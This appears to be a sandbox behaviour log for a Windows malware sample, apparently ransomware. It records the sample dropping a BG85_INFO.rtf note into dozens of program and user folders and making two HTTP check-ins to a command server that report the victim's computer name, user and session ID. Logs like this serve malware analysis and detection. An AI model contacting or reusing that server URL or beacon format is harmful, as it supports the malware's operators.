C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f5hc8vjc.default-release\datareporting\archived\2020-07\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Microsoft\Media Player\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Backup\new\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\lua\extensions\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\art\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\MEIPreload\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\ProgramData\Package Cache\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\packages\Patch\x64\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\Favorites\Microsoft Websites\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\zi\Indian\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f5hc8vjc.default-release\storage\permanent\chrome\idb\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Microsoft Sync Framework\v1.0\Runtime\x64\resources\1033\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f5hc8vjc.default-release\storage\default\moz-extension+++74bf55e1-f8f0-4b8e-ae67-9c4088745841^userContextId=4294967295\idb\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\images\cursors\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\fonts\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\GPUCache\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\Favorites\Links for United States\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe HTTP URL 10 http://sec.timerz.org/addrecord.php?apikey=bg85_api_key&compuser=UCQFZDUI|Admin&sid=qZ7vFvv6UiRj9w0t&phase=[FIN]1F625CDBAAB7078C|3277|58|3335 Process not Found File created C:\Users\Admin\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\MSBuild\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\f5hc8vjc.default-release\OfflineCache\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\deploy\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\lua\http\requests\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f5hc8vjc.default-release\datareporting\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\ProgramData\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe HTTP URL 9 http://sec.timerz.org/addrecord.php?apikey=bg85_api_key&compuser=UCQFZDUI|Admin&sid=qZ7vFvv6UiRj9w0t&phase=FINISH Process not Found File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\ProgramData\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\zi\Pacific\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\lua\modules\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\bin\server\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\lua\sd\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\ProgramData\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\ProgramData\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\Desktop\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\zi\SystemV\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\jfr\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\lua\http\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\Videos\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\db\bin\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\skins\fonts\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Public\Libraries\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Public\Recorded TV\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Adobe\Acrobat\9.0\Cache\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\Saved Games\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\bin\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\84.0.4147.89\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Public\Recorded TV\Sample Media\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Platform Notifications\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\ProgramData\Microsoft Help\BG85_INFO.rtf 